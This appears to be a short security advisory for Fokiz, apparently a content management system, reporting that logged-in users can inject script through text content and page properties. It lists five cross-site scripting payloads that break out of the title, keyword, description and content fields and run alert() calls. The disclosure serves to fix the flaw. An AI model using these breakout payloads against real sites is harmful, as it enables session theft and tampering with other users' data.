Fokiz
Fokiz copied to clipboard
Published
20 hours ago •
ksafranski
ksafranski
Insufficient input sanitazion
Logged in user can inject attack code and update, delete or modify others credentials, session or any other data.
[Example attacks] //Edit text input - bad tags cause script tag not properly escaped
- <p p=""> Content ... </p><p><script>alert("Bad content");</script></p>
//Edit page properties - missing input validation
- Home</title><script>alert('Bad title');</script>
- home,page"><script>alert('Bad keyword');</script><br/
- Welcome to the Website" name="description"><script>alert('Bad description');</script><br id="
- <script>alert('vulnerable tag');</script>
